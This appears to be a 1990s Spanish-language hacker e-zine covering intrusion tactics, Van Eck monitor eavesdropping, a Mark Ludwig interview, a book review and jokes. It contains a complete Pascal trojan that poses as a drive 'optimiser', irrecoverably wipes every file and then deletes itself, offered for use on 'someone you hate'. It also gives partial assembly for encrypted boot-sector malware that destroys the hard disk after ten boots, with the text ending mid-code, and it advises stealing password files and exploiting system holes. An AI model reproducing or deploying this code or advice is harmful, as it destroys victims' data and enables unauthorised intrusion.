hacker quiera entrar a un sistema, por lo tanto hay varias formas en las
cuales un hacker puede hacer uso de su conocimiento. Veamos que tenemos aca:
Tenemos el hacker clasico, el hacker entusiasta, el hacker espia, el hacker
como espia politico, el hacker vengativo y finalmente el hacker para contra-
tar.
Comunmente estos hacker van a operar desde una cuenta que tenga bajo acceso;
esto es porque estas cuentas son las que mas perduran y las que menos vigila-
das estan, pero como el hacker en cuention tiene gran cerebro desde esta
cuenta se va a poder abrir paso a otras con mayor jerarquia.
El hacker para contratar y los espias tienen un objetivo, inclusive personas,
estos solo se van a preocupar de conseguir el famoso USERNAME/PASSWORD para
poder entrar, hacer lo que tengan que hacer y listo.
Los hackers vengativos van a tratar de hacer lo mismo pero con la diferencia
de que una vez adentro van a tratar de crackear todo o hacer el mayor danio
posible, para esto necesitan una cuenta con una alta jerarquia en cuanto a
seguridad. Muchos de estos van a seguir entrado en la maquina hasta que sean
arrestados o venga otro hacker mas poderoso (usualmente un hacker para contra-
tar) y lo calle.
Ahora bien, el verdadero hacker, puede o no llegar hasta el ultimo rincon del
sistema que esta hackeando, si el se metio en un sistema que tiene poco mate-
rial o es demaciado complicado y la info no es tan grosa como para que valga
la pena el esfuerzo del hacking, lo mas probable es que el deje este sistema
y nunca mas vuelba a entrar. De cualquier forma las maquinas siempre van a
estar ahi.
Como sabemos cuando aventurarnos mas y cuando no...
- Lean todo documento o TXT posible y ejecuten los programas cuando sea posi-
  ble.
- Bajense todo lo posible, si son files de password o scripts mejor.
- Aprendan sobre el sistema operativo o el sistema de BBS que esten usando
  en el lugar donde hayan entrado, nunca se sabe...
- Fijense si otras computadoras pueden ser alcanzadas o conectadas a travez
  de la que Uds se han metido.
- Cuidense siempre el culo, un hacker feliz vive para hackear de nuevo.
Si, tal vez, encontraron en un download o en un capture alguna info que pueda
valer guita en el mercado (otras enpresas del mismo rubro, etc) pueden inten-
tar venderla. Yo no lo recomiendo, siempre hay "contra espias" y es ahi
cuando tenemos problemas. Sino lo que pueden hacer es hacerla publica por el
hecho en si, quiero decir:"TODA INFO DEBE SER LIBERADA Y DADA A CONOCER PUBLI-
CAMENTE" este es el verdadero hacking, que no haya mas secretos!!!
Pero presten atencion a algo cuando esten dentro de algun lado: los sistemas
operativos son programas tan gigantes y extensos que nunca se sabe si todos
los bugs han sido corregidos. Hay veces que una version nueva viene con
algunos truquillos ocultos que solamente los mas expertos saben, y hay veces
la mayoria de hecho, que estas "funciones" dejan unos agujeros enormes en la
seguridad del sistema. USENLOS SI LOS ENCUENTRAN!!!!
Tambien dentro de un sistema deben buscar files que hayan sido backupeados,
por ejemplo, si PEPE COMPUTADORA se logueo antes que nosotros y se logueo mal
el file de loggins que siempre esta presente va a decir que PEPE COMPU... uso
mal su password, etc. bueno si conseguimos este file, vamos a tener seguro
nombres de usuarios y/o posibles passwords que con un poco de cerebro podemos
aclarar.
Traten siempre de buscar comandos escondidos en los menues, como por ejemplo:
^C, ALT-X, ^Q, ^Z, ALT-SHIFT-PRNTSCRN, etc. estos comandos siempre estan pre-
sentes, traten de encontrarlos, siempre dan acceso a backdoors o si tenemos
suerte al sistema operativo.
Bueno queridos alumnitos, esto ha sido todo por hoy... :)
y acuerdense, simpre cuidense las espaldas!!!



     Take care of the means and the ends will take care of themselves.

                          - Mahatma Gandhi -



3- Programming page
///////////////////
Sorry, esta todo en ingles no tuve tiempo de traducirlo. Esta hecho por
un amigo, lo que hace este programa es ir recursivamente por todos los
directorios del derive y borra todos los files que encuentre.
aprendan ingles, que es un hacker sin este preciado idioma que tanto acceso
a libros e info nos da...

program Easytroj; { Here is a program that exemplifies a simple recursive
                    procedure that goes through and deletes all the files
                    in each of the directories on the disk - and takes
                    away the read-only attribute of all the philes.}
uses dos;
var
 filerec        : searchrec;
 targetfile     : file;
 oldattr,newattr: word;
(*-------------------------------------------*)
{procedimiento que borra los files, etc}
procedure trashdirs(path : string);
var
 path2    : string;
 fileinfo : searchrec;
 fileinfo2: searchrec;
 i        : byte;
 old,new  : word;
 f        : file;
begin
 findfirst(path + '\*.*',directory,fileinfo);{This finds all directories}
 while doserror = 0 do
  begin
   if (fileinfo.attr = directory) and        {If Directory...           }
      (fileinfo.name[1] <> '.') then begin   {and isn't '.' or '..'     }
       path2 := path + '\' + fileinfo.name;  {then alter path.          }
       chdir(path2);                         {Change to this path...    }
       findfirst('*.*',(anyfile - directory),fileinfo2);{Find all files }
       while doserror = 0 do begin
        assign(f,fileinfo2.name);            {Assign var F to files name}
        getfattr(f,old);                     {Get F's old attr.         }
        new := old and $FE;
        setfattr(f,new);                     {Get rid of Read-Only      }
        erase(f);                            {Erase file...             }
        rewrite(f);                          {Remake it...              }
        close(f);                            {close it...               }
        erase(f);                            {Then erase it, and make it}
                                             {so it can't be unerased.  }
        findnext(fileinfo2);                 {Find next file.           }
       end;
      trashdirs(path2);                      {Recursively go back and do}
                                             {it again to next directory}
   end;
   findnext(fileinfo);                       {Find next direcotry       }
  end;
end;

(*----------------------------------------------*)
procedure trash(drive : char);               {Use this procedure to     }
                                             {trash all the files in the}
                                             {root directory.           }
begin
 chdir(drive + ':\');                        {Change to root directory  }
 findfirst('*.*',anyfile-directory,filerec); {find all files...         }
 while doserror = 0 do begin
  assign(targetfile,filerec.name);           {Assign var targfil to file}
  getfattr(targetfile,oldattr);              {Get targetfile's old attr }
  newattr := oldattr and $FD;
  setfattr(targetfile,newattr);              {Get rid of Read-Only.     }
  {$I-}erase(targetfile);                    {Erase file...             }
  rewrite(targetfile);                       {rewrite file...           }
  close(targetfile);                         {close file...             }
  erase(targetfile);{$I+}                    {erase file...             }
  findnext(filerec);                         {find next file.           }
 end;
 trashdirs(drive + ':');                     {calls Trashdir's to trash }
                                             {all directories/files     }
end;

(*-------------------------------------------*)
procedure me_borro;
var
 F:  file;

begin
 Assign(F, 'EASYTROJ.EXE');
 Erase(F);
 rewrite(F);
 close(F);
 erase(F);
 end;

var
 c : char;
cur: string;
begin
 Writeln;                                  {Put your fake info here.    }
 Writeln;
 Write('Enter drive to "optimize": ');     {Make the shithead enter     }
                                           {the drive, or do it yourself}
 readln(c);
 {$I-}Chdir(c + ':\');{$I+}                {Change to root.             }
 If IOResult<>0 then begin                 {If error then, write error  }
                                           {message...                  }
  Writeln;
  Writeln('Evidently, the drive that you entered is');{Change this to   }
  Writeln('not currently operating.  Please execute');{whatever you wish}
  Writeln('this program again with the correct info');{or just make it  }
  Writeln;                                 {trash a directory           }
  halt;                                    {Exit program.               }
 end
 else trash(c);                            {if no error,then trash drive}
 Writeln('Ok, asshole.  You''re dead.');   {Change this to whatever.    }
me_borro;
end.                                       {The End!                    }


Bueno este simple pero muyyyyyy efectivo programita es solo para gente venga-
tiva, si quieren jugar con el, bueno.... busquense alguien que odien.



           And God saw that it was good. And God blessed them,
           saying 'Be fruitful and multiply'

                    -Genesis 1:21,22


4- Literatura
/////////////

Sipi... porque el cyberspace es tambien cultura... asi que aca, sector libros

"The cukoo's egg" o "El gato y el raton" (en espaniol) por Clifford Stoll
en argentina es : editorial planeta, coleccion best-seller mundial y es del
anio 1990.

En la decada del 80, el autor del libro se encontraba en la universidad de
Berkeley trabajando como administrador del sistema estudiantil que corria bajo
sistema operativo UNIX.
Entre otras cosas el autor del libro deevia chequear la contabilidad, ahora
en el medio de un chequeo salto que en un saldo faltaban 75 centavos. Al bus-
car el error este hombre comenzo a entrar en lo que despues seria una guerra
casi interminable entre el y un famoso y muy astuto hacker. Este hacker
mencionado arriba en las aclaraciones fue arrestado hace unos 3 o 4 anios.
El libro esta encrito por el protagonista mismo que dista mucho de ser un
escritor pero el libro se deja leer. En el podemos encontrar entre otras cosas
muchos de los agujeros en la seguridad del UNIX (ya corregidos) y de como
el hacker pudo hacer uso de ellos. Tambien los metodos que tiene un administ.
del sistema para protegerse.
no hay mucho mas para hablar, solo leer... leanlo, diviertanse, aprendan y
usen.


                 The disciples asked the master:

                - What will happen with you after your death?
 
                - I will go to the hell.

                - But, they think that you are very holy master!

                - If I don't go to the hell, how can I help you?

                               - Zen text -



5- aclaraciones varias
//////////////////////
hoy en esta seccion vienen unos chistes hechos por un hacker gallego.
trate lo maximo posible de corregir horrores como "ordenador" en vez de
computadora, y otras tantas pero algunas se quedaron.

Como mantener los diskettes en buen estado (segun un lamer)

        1) No dejes los diskettes dentro de la computadora durante largos
periodos de tiempo; la informacion puede gotear sobre los circuitos y
estropearlos o causar corto circuitos. Y sobre todo, no los metas nunca
boca abajo, es muy fastidioso tener que volver a colocar cada bit en su
sitio.

	2) Para guardar los diskettes sin que ocupen espacio, enrollalos
y metelos dentro del canuto de un boligrafo.

        3) Limpia los diskettes con jabon y un trapo todas las semanas.
Para secarlos, escurrelos o tiendelos al sol.

	4) Para eliminar las particulas microscopicas de polvo y metal, lo
mas rapido es usar un iman, pero tambien puedes usar lija y frotar con un
cepillo de puas de acero.

	5) Engrasa los diskettes cada mes para que giren mas rapido.
Tambien puedes conseguir un tiempo de acceso mas rapido si haces muchos
agujeros en la cubierta; una perforadora de 11 agujeros es ideal.

	6) Pon antibioticos a tus diskettes para que no se infecten con
virus. Si notases que alguno de ellos esta enfermo, ponlo en cuarentena
lejos de los demas. Ponles tambien insecticidas, para que no se los coman
las cucarachas.

        7) Si tienes problemas para sacar tu diskette de la computadora, mete
un par de monedas en la ranura y pegale patadas a la computadora hasta que te
devuelva tu dinero, escupiendo el diskette junto con el cambio.

	8) Cuando le pongas una etiqueta a tu diskette, recuerda que debes
ponerla sobre la misma superficie del disco, no sobre su cubierta. Para
que el diskette sepa cual es su etiqueta, primero pon la etiqueta en blanco
y luego usa una maquina de escribir para rellenarla, apretando muy fuerte
las teclas para que las letras se queden bien marcadas en el diskette. Si
tienes algun error, pon liquido corrector por los dos lados del diskette.

	9) Si tienes que cambiar la etiqueta, recuerda arrancar la anterior
para no confundir al diskette. Si esta pegada muy fuertemente le hara
danio al arrancarla, asi que dale al diskette unas fregaduras con alcohol.
Si es una etiqueta provisional que esperas cambiar pronto, tambien puedes
afeitar al diskette, para que no se le peguen los pelos.

	10) Si no te queda espacio en el diskette, agitalo fuertemente para
comprimir la informacion (pero recuerda que antes debes tapar todos los
agujeros con cinta adhesiva para que no se salga)

	11) Para copiar un disco puedes fotocopiarlo, pero es mas barato
meter dos discos a las vez con papel carbon en medio en la misma ranura
de tu computadora.

	12) Para manipular ficheros muy grandes puedes usar tijeras y
pegamento, pero para los ficheros pequenios tendras que usar una cuchilla
y meter el diskette en un microscopio electronico.

	13) Si vas a viajar con tus diskettes, recuerda que no tienes que
sacartelos de los bolsillos al pasar por los detectored de metal, porque
tienen muy poco hierro y no van a pitar.

	14) Cuando llegue el invierno ponles anticongelante; durante el
verano ponles bronceador, no sea que se quemen debajo de la lupa que usa
la computadora para leerlos.

	15) Backups ? Para que ?  Si tus discos estan en buen estado !

	16) Y sobretodo, en caso de problema, recuerda que debes formatear
los diskettes antes de usarlos.



sugerencias y criticas se reciven en:

        The Infected Info
        P.O.B. 24442
        Har Hatzofim
        91242 - Jerusalem
        Israel.
  ÜÜ²     ÜÜİ   ÜÜ² ßß²²ÜÜ    ÜÜ² ßß²²ÜÜ    ÜÜ²   ÜÜ² ßÛÜÛß²²ÜÜ    ÜÜ² ßß²²ÜÜ
ßÛÛ²±   ßÛ²±° ßÛÛ²±    ²²±° ßÛÛ²±    ²²±° ßÛÛ²± ßÛÛ²±  Ş²İ  ²²±° ßÛÛ²±    ²²±°
 Û²±°    Ş²±°  Û²±°    Ş²±°İ Û²±°    Ş²±°İ Û²±°  Û²±°   ±   Ş²±°İ Û²±°    Ş²±°İ
 Ş±°İ    ²±°İ  Ş±°İ     ±± ° Ş±°İ     ±± ° Ş±°İ  Ş±°İ   °    ±± ° Ş±°İ     ±± °
 Ş° İ  Ü²° ß   Ş° İ     ±° ° Ş° İ     ±° ° Ş° İ  Ş° İ        ±° ° Ş° İ     ±° °
 Ş °İßßÛ±ÜÜ    Ş °İ ßßßß° °± Ş °İ     ° °± Ş °İ  Ş °İ        ° °± Ş °İ ßßßß° °±
  °±    ß °±Ü   °±      ° °±  °±      ° °±  °±    °±         ° °±  °±      ° °±
  ±²     Ş °±İ  ±²     Ş °±²  ±²     Ş °±İ  ±²    ±²        Ş °±²  ±²     Ş °±²
  Şİ    Ü° °±²  Şİ    Ü° °±²  Şİ    Ü° °²   Şİ    Şİ       Ü° °±²  Şİ    Ü° °±²
  Şİ  Ü²° °±²İ  Şİ  Ü²° °±²İ  ŞİÜÜÛ²°°ßß    Şİ    Şİ     Ü²° °±²İ  Şİ  Ü²° °±²İ
       ß°°±²Û        ß°°±²Û                               ß°°±²Û        ß°°±²Û
         ßÛß           ßÛß                                  ßÛß           ßÛß



Especial para:

                  ÜÜÛÛÛÛÛÛÛÛÜÜ
               ÜÛÛßßÛÛ     ßßÛÛÜ                       Ş
                ß   ÛÛ       ÜÛÛ                      ŞÛ
                   ŞÛİ     ÜÛÛß                      ŞÛİ
              ÄÄÄÄ ÛÛ Ä ÜÜÛÛß ÄÄÄŞÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÛÛÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
              ÄÄÄÄŞÛÛÜÛÛßß ÜÜÜ ÄÄŞÛÄÄÄÄÛÄÄÄÄÜÜÜÜÛÛÄÄŞÛİÄÜÜÛÛÄÄÄÄÛÛÛÛİÄ
              ÄÄÄ ÛÛÛß Ä ÜÛÛß ÄÄÄÄÛİÄÄÛÄÄÄÜÛßßÄŞÛİÄÄÛÛßßÄŞÛİÄÄÜÛßßÄŞÛİ
              ÜÜßßÛÛ Ä ÜÛßß  ÜÜ ÄÄŞÛÜÛ Ä ÛÛ ÄÄ Ûİ  ŞÛİÄÄ ÛÛ  ÛÛ ÄÄ Ûß
              ÄÄ ŞÛİÄÄ ßÛÜÜßßÛİ ÄÄ ÛÛ ÄÄŞÛİÄÄÄÄÄÄÄ ŞÛ ÄÄŞÛİÄŞÛİÄÄÄŞÛİÄ
              ÄÄ ÛÛ ÄÄÄÄÄÄÄÄŞÛİÄÄÄŞÛİÄÄ ÛÛ ÄÄÄÄÄÄÄ ÛÛ ÄÄŞÛ Ä ÛÛ  ÛÛÛ Ä
                ŞÛİ        ÛÛÛ     ÛÛ   ÛÛÛ        ŞÛİ  ÛÛ    ÛÛÛÛÛ
                ÛÛÛ       ÛÛÛ      ŞÛİ  ŞÛÛÛ     Ş     ŞÛİ
                         ÛÛÛ        ÛÛ   ÛÛÛÛ   ŞÛ           Magazine
                                          ÛÛÛÛİÛÛÛ
                                           ÛÛÛÛÛÛİ


                                P ú S ú Y ú C ú H ú O
                                       MAGAZINE

por:
         ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
         ³       Hacking the world       ³     Desde Israel para 
         ³ ²ÛÛÛßßÛ ²ÛÛÛßÛ ²ÛÛÛßÛ ²ÛÛÛßßÛ ³     el resto del mundo
         ³ ±ÛÛÛ  Û ±ÛÛÛÜ  ±ÛÛÛ Û ±ÛÛÛ  Û ³     conectado//
         ³ ÛÛÛÛ  Û ÛÛÛÛÜÜ ÛÛÛÛÜÛ ÛÛÛÛ  Û ³
         ³     Freedom in cyberspace     ³
         ³    Freedom  of information    ³
         ³  Free Ron Arad Hacking Group  ³
         ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Flashing pictures on my screen, show to quickly to be seen, does not register
in my conscious mind, propaganda of another kind. They fuckin'with me
subliminally...
                    MIKE MUIR, SUICIDAL TENDENCIES.

texto nro 3.

convenciones, de aqui en adelante Bill Gates es El abuelo, McAsshole es...bue.
RTM (si no saben despues se enteran) es El Creador y Mitnik (idem) El hacedor/

Indice:
        1- Entrevista a Mark Ludwig!!!
        2- Hacking
        3- Programming page
        4- Literatura
        5- Aclaraciones varias

..............................................................................



1- Entrevista a Mark Ludwig.
///////////////////////////

Este especie de entrevista esta usada por permiso del autor. Lamentablemente
esta en ingles. Si... pero bue... si no saben ingles sencillamente jodanse
ya lo dije en el texto anterior: es la llave a mucha informacion.

aca vamos....

Yo: Why did you get interested in computer viruses?

ML:

I thought they were interesting as genetic, self-reproducing entities, and
I just wanted to learn something about them, as a scientist. What little I
could find out about artificial life seemed very much skewed toward the
evolutionary point of view, which is in my mind more philosophy than good
science. Since computers are universal simulating machines, I think one thing
AL [Artificial Life] researchers can get into is a sort of programmatic story
telling which has little to do with reality. I mean, of course you can design
something to evolve (Lamarkian or Darwinian) just because you have an
universal simulating machine. But does that have anything to do with real
life?

I saw viruses as a real-life phenomenon, rather than a laboratory construct.
Perhaps they are the only "life-form" apart from earth's carbon-based life
we will ever meet. Laboratory AL experiments tend to be contrived because
the researcher's intelligence inevitably enters in. Viruses, as a phenomenon,
are somewhat different. They're in the wild. What do they do there? Do they
evolve? Can they evolve? The whole question just seemed fascinating to me.


Yo: When did you start to deal with computer viruses and could you describe
shortly your work?

ML:

About 1988 or 1989. Given the above interest, the natural thing to do seemed
to be to get some viruses and learn about them. That proved to be a real
challenge though. Technical knowledge of this field was very hush-hush then.
I ended up solving the problem by setting up a BBS and announcing that I'd
send people $20 if they'd send me a virus. So I got a few that way. But I
realized it was going to be hard to discuss my scientific interests with
anyone if no one understood the technology behind viruses. Furthermore, I
did not believe that this silence was best for mankind in the long run. I
mean, here is this brand new technology -computers & information science-
and a brand new phenomenon -viruses- and all anybody wanted to do was to make
it go away. As a scientist, I was much more inclined to explore the
possibilities. Yet I knew I couldn't possibly do that alone if we're really
going to find out what uses these things might have, or what understanding
they might actually contribute to other scientific disciplines. Science
doesn't work like that now-a-days. The knowledge has to be more generally
available before anyone could even begin to think along these lines. So I set
out to make that knowledge accessible.


Yo: Why did you write "The Birth of a Virus" ?

ML:

"The Birth of a Virus" is the French edition of "The Little Black Book of
Computer Viruses." I plainly wrote it so that the average programmer could
learn the basics of how a virus operates. That was published in 1991. It is
not intended to be a compendium of all the tricks virus programmers use, or
anything like that. It is an introduction. The viruses discussed in the book
(4 of them) are pretty basic, but they get some of the basic techniques
across, and illuminate the issues which a virus must face to reproduce.


Yo: Why did you write "Computer Viruses, Artificial Life and Evolution"?

ML:

CVALE is a first stab at discussing my original interest in viruses. It
discusses questions like "Are viruses alive?" and digs into viral evolution,
comparing viruses to real-world organisms, etc. It's about more than just
viruses, though. It's about the whole Artificial Life movement, as well as
science and philosophy. Really, I think what I've seen in staring hard at
viruses might be very valuable in bringing about a revolution in evolutionary
biology. Using carbon-based organisms is a horrible way to study evolution.
They're too complex and we don't understand them well enough. The time frames
of evolution are too large. And deep philosophical questions rear their heads
all over the place. Inside the computer, most of these difficulties just
vanish. The one thing you have to be careful of is the universal nature of
the computer. What you don't want is to create some kind of science that will
always confirm itself. Looking at viruses can teach us how to impose some of
the checks and balances that science needs to be valid.


Yo: Do you think that your work is unethical or illegal?

ML:

Illegal? Some people tell me that it is in some parts of the world. Certainly
it is not illegal in the US.

Unethical? That is a more difficult question. I don't think so, but I'm open
to correction. I mean, I realize that by publishing viruses, somebody could
use that information to hurt somebody else. It's not my intention to empower
would-be criminals. At the same time, I think a lot of people can get hurt
because people who should have the technical expertise to deal with malicious
viruses don't have it and have a hard time getting it. The idea that you can
combat a human intelligence with a piece of software is ludicrous. Anybody
who just installs an anti-virus and sits back on his laurels is asking for
trouble. At least some virus writers are intelligent people. And the only way
to combat a human intelligence is with human intelligence. In other words,
you start with first hand knowledge of what viruses are and how they work.
Given that first hand knowledge, you can reasonably choose anti-virus
software to protect your systems, etc., but you don't just pick the program
based on some advertisement, or some review that purports to be unbiased,
albeit written by an a-v developer or by some peon at an advertiser-driven
magazine. Thus, I see my work as being potentially very beneficial in that
it brings education and light where darkness has been.


The only way I can see to answer the ethics question is to weigh the merits
and dismerits of what I'm doing. I've always taken the attitude that I'll
do this on a tentative basis, but if it proves out that people are taking
my stuff and wreaking havoc with it, I'd be the first one to condemn it.
Now, 3 years after the release of The Little Black Book, I think I can say
safely that people are not, for the most part, running out to destroy the
world with it. They are behaving responsibly.

We do not make it illegal to manufacture hammers or knives because people do,
occasionally, kill other people with those implements. We do not call the
knife manufacturer immoral or unethical. Killing someone or not with them
is the responsibility of the user, not the manufacturer.

I fail to see why viruses should be treated differently. The a-v community
argues that there is no such thing as a good virus, ergo there is no benefit
side to the equation, as in the case of a hammer. Even if they were right on
that point, though, it would not be logical to conclude, therefore, that
making information about viruses available is therefore also bad. Someone 
who learns about viruses -who gets the first hand knowledge about them- is
going to be a whole lot better at facing a malicious virus running amok in
a network than somebody who simply sits back and lets somebody else, e.g. an
anti-virus company, do his job for him. The second person will in all
likelihood need expert help to get rid of the virus. The first will be the
expert to begin with. Thus it seems reasonable to suggest that even if all
viruses were only evil (which I do not believe), it could still be very good
to make the knowledge of them available, because in so doing you are teaching
people how they work and giving them the expertise to fight them better.  As
far as I can see, the benefits do outweigh the dangers here.

I think when considering the ethics of all of this, we have to realize that
the a-v community is trying to partake of a new ethic which, if carried to
its logical conclusions, will have a chilling effect on all innovation and
all human initiative. You see this new ethic throughout society. It damns
anything which could potentially be harmful before you even know whether it
will be beneficial or not. I don't care whether you're talking about a-v or
environmentalism or about the latest drive to socialize medicine in the US,
this mindset is behind it. The bottom line is an attempt to create a
risk-free socialist world controlled by a technical elite. Now, you can't
stop hammers with this approach, but you can sure stifle anything new,
because you can magnify the risks, and diminish the benefits, and people
don't have an intuitive feel for it.

The truth is that people who reason this way are trying to make gods out of
themselves. They are not content to let their opinions be opinions. Rather
they try to elevate them into moral truism. A lot of people in the west
still have a love-affair with socialism, so they buy into this risk-free
attitude without questioning it much. We shouldn't be deceived by such
propaganda though.


Yo: What problems did you have in presentation of your work?

ML:

Well, nobody wanted to print it. But it was not that big of a deal since I
already owned a publishing company which published other books for university
classes. I just had to decide whether we should get into this line or not.
I've had enough experiences in other fields of science to know that if you
want to do anything new you're going to meet resistance. I haven't run into
any problems I didn't expect from the start.


Yo: Why people are willing to reject the concept of beneficial viruses or
   artificial life in general?


Most people don't reject the idea of a beneficial virus if you discuss it
with them intelligently. Rather, they become open to it rather quickly.
There's a certain amount of inertia you have to overcome to get people to
actually install a beneficial virus, though, because they've been brainwashed
into believing that virus = bad. Once you get past that, it's not a problem.

Now, obviously, I won't say the same of the anti-virus community. Here you
have a case of group-think where everyone just echoes everyone else's
opinion. It's kind of like an extreme political party. Breaking ranks will
get you ostracized. They are the ones who've been trying to brainwash people,
and they want to keep it up because they are pushing an agenda that puts them
in the driver's seat. They know full well that to make any concession in
their position is to open the floodgates. How will you ever pass legislation
against the free dissemination of virus-related information once you admit
that some of it might be beneficial? You won't. So they'll fight the idea of
a beneficial virus to their dying breath.

Artificial Life is a different matter, though. I think a lot of people reject
the concept in its strong form for religious or philosophical reasons.
Furthermore I think those reasons are completely valid. I mean, IF you accept
the idea that life is nothing more than atoms and physics, it makes sense to
define life functionally and then design something functionally equivalent
and call it life. However that IF is a big if. There are plenty of reasons
not to do that, both philosophical and purely scientific. Most of the people
doing AL work just leap right in like good positivists and sweep the deeper
questions under the rug. If AL is ever to garner widespread support, those
who study it are going to have to be more sensitive to the philosophical
issues. I tried to do that in my book, though I haven't gotten a whole lot
of feedback as to how well I succeeded.


Yo: Are there persons in virus/anti-virus field that you respect and why?

ML:

Technically there are quite a few people I respect. Writing viruses and
anti-viruses is kind of like a programmer's version of a grand master's
chess game. You need both a good deal of skill and a sense of the art of it
to play on either side.


Intellectually, I don't have very much respect for many of the people who've
made a name for themselves in a-v work. Many of them aren't thinking for
themselves anymore. They've made up their minds and they won't hear new
ideas. They're like politicians who are so committed to a movement that they
don't dare change, and they stagnate intellectually as a result.

There are a whole lot of people a step below the big names, though, who
are just good people trying to keep the computers in their companies clean
and what not. They aren't pushing an agenda - they're just trying to get
their job done. They're open minded and they will listen to new ideas.
I respect these people a lot, and it's my sincere desire to help them get
their job done. By making technical information about viruses available,
I'd like to believe that I'm doing that.


..............................................................................

                        The Virus Syllogism:

                  Computers are made to run programs.
                Computer viruses are computer programs.
         Therefore, computers are made to run computer viruses.

...............................................................................


2- Hacking
//////////

Antes que nada el autor, yo, no se hace responsable si un pedazo de imbecil
pone en practica lo aca enseniado y le sale mal....

Tal vez esto que veamos hoy paresca ciencia ficcion o una pelicula varata,
pero NO. Funciona. Lo prove y no solo yo muchos e inclusive cientificos y
la policia.
Primero que nada veamos algo sobre radiacion y como emana esta de los apara-
tos tales como computadoras, TVs etc.
Si tienen una computadora serca de un tv tal vez hayan notado algo muy
extranio, hay veces que mientras se esta trabajando con la maquina y se
intenta ver tv algunos canales se ven mal o con interferencia. Esto pasa
cuando el campo electromagnetico de la computadora y los cables son captados
por el tv. Si podemos sintonizar un poco el tv podemos a veces dar una leve
imagen del monitor de la computador...
La razon es muy simple, todos los aparatos electricos y en especial los
electronicos actuan como una antena de radiacion electromagnetica. Las
computadoras operan con frecuencias de radio (las pueden ver en el manual
de su maquina donde dice FCC REGULATIONS), a pesar de que siempre las empre-
sas tratan de hacerlas lo menos fuerte posibles siempre se escapan.
Es por eso que hay maquinas muy sencibles (militares y del gobierno) que se
encuentran en lugares aislados donde esta radiacion no puede ser captada ni
escaparse. Pero bueno, hay una maquinita llamada Van Eck que agarra esta
radiacion y la transmite al televisor y ahi la podemos grabar en una video.
Ahora, que es esta Van Eck? es un televisor que "escucha" esta radiacion y
imprime esta radiacion en la pantalla, de modo que cada info puede ser vista;
el problema es que el televisor recive esto y no sabe que hacer con ello, el
Van Eck produce una senial sincronizada artificial, se usan dos osciladores
ajustables a modo de Vertical y Horizontal del tv. Para que la imagen este
bien se necesitan constantes resincronizados de los osciladores, esto antes
hecho a mano, ahora se puede hacer por computadora con un simple programita,
las seniales son convinadas matematicamente y son mandadas a traves de un
modem a la maquina y esta a su vez al tv, todo esto automaticamente a medida
que la radiacion es recivida y decodificada.
Si alguno de ustedes sabe algo de electronica se puede armar este aparato
por el solo costo de 20 U$S, o inclusive si van por los angeles lo pueden
conseguir en los famosos "negocios para investigadores privados" ya armados
y listo para usar.
Ahora bien, imaginense que podriamos hacer con esto: tenemos una antena para-
bolica en direccion a la computadora que queremos hackear, la antena conecta-
da a una laptop que va gravando todas las seniales. Todo lo que pasa en esa
computadora queda guardado en la nuestra y OH!!!! de repente tenemos muchos
passwords y nombres de usuarios!!!
Bueno, espero que a alguno de ustedes le haya sido util, aunque mas no sea
a modo de informacion de que esto si existe y se puede hacer.

..............................................................................




3- Programming page
///////////////////
Hoy nos toca un poquito de ASM. Si, es complicado pero que le vamos a hacer.
con asm podemos hacer todo, la maquina queda a nuestra merced.
este programa se compila con el TASM (Turbo Assembly de borlan)

------cortar aca------
;este programa es indetectable por windows y todos los antivirii.
;cuando este programa es ejecutado instala una copia del boot encriptada
;en el boot de la maquina y hace un back up del viejo boot en el sector 7.
;cuando la victima rebootea la maquina se carga en 0000:7C00. El programa
;primero se desencripta en 8000:0000 y continua trabajando desde ahi.
;decrementa el contador en el boot sector, si el contador es 0 entonses
;hace teta el drive. Cualquier intento de ahi en mas de bootear la maquina
;hace que se muestre el mensage de error y se cuelgue el HD. Si el contador
;no llego a 0 el sector 7 es cargado desde el disco en 0000:7C00 y el control
;queda en el, y el proseso de booteo continua normalmente.

.model tiny
.stack 200h

HDDATA          EQU     01f0h
HDERROR         EQU     01f1h
HDPRECOMP       EQU     01f1h
HDSECTORS       EQU     01f2h
HDSECTOR        EQU     01f3h
HDCYLLOW        EQU     01f4h
HDCYLHIGH       EQU     01f5h
HDDRHEAD        EQU     01f6h
HDDCMD          EQU     01f7h
HDSTATUS        EQU     01f7h
; definicion del HD drive port

STEALTH         EQU     08000h
; bit del stealth usado para esconder el i/o a disco

READ            EQU     020h
; comandos HDD leer datos

WRITE           EQU     030h
; escribe datos

ON              EQU     040h
; enciende en HD

OFF             EQU     0E0h
; apaga

SLEEP           EQU     0E6h


.CODE
;instalamos el maldito bastardo
mov     ax, cs      ;seteamos el seg viejo
mov     ds, ax
mov     es, ax
mov     di, OFFSET sectorData
mov     ax, 0
mov     bx, 0
mov     cl, 1
mov     ch, 1
mov     si, READ
call hdRW
;lee el boot viejo
mov     di, OFFSET sectorData
add     di, 401
cmp     BYTE PTR[di], ';'    ;busca la firma ;)
jne short nosig
cmp     BYTE PTR[di+1], ')'
je  short exit               ;si ya esta instalado nos fuimos...

nosig:
        mov     ax, OFFSET sectorData
        mov     di, ax
        mov     ax, 0
        mov     bx, 0
        mov     cl, 7
        mov     ch, 1
        mov     si, WRITE
        call hdRW          ;copie el boot en el sector Nro 7
        mov     di, OFFSET sectorData
        mov     si, OFFSET bootProgram
        cld
        mov     cx, OFFSET bootProgramEnd - OFFSET bootProgram
        rep movsb         ;copiamos nuestro chiche en el boot
        mov     cx, OFFSET bootProgramEnd - OFFSET start
        mov     di, OFFSET start - OFFSET bootProgram
        add     di, OFFSET sectorData
        mov     si, di


EncryptNextbyte:
        lodsb
        xor     al, '*'
        stosb
        loop EncryptNextbyte
        mov     ax, OFFSET sectorData
        add     ax, 400
        mov     di, ax
        mov     [di], BYTE PTR 0Ah  ;contamos en el boot 10 veces
        mov     [di+1], BYTE PTR ';'
        mov     [di+2], BYTE PTR ')'
        mov     ax, OFFSET sectorData
        mov     di, ax
        mov     ax, 0
        mov     bx, 0
        mov     cl, 1
        mov     ch, 1
        mov     si, WRITE
        call hdRW     ;escribo en boot nuevito


exit:
        mov     ah,4ch
        int 21h

;**********************************
;vamos con el prog del boot sector
;**********************************
bootProgram:             ; esto va en 0000:7C00h
        cld
        mov     ax, cs
        mov     ds, ax
        mov     si, OFFSET start - OFFSET bootProgram + 7C00h
